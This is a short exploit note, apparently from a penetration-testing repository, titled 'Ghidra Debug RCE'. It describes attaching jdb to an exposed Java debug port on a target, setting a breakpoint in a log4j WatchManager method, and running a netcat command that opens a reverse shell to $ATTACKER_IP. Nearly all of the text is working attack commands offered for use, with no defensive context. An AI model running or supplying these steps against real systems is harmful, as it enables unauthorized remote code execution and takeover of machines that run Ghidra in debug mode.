403 B

Raw Blame History

Ghidra Debug RCE

If debug mode is enabled, connect to it via jdb

jdb -attach $TARGET_IP:$TARGET_PORT

classpath
classes

Stop the service

stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()

Wait until the breakpoint hits and start a reverse shell

print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")